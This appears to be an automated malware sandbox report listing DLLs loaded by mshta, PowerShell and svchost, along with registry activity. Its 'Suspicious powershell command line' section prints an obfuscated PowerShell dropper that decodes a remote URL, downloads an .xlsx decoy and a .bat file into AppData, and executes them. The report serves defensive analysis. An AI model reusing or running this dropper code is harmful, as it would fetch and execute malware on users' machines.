Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function 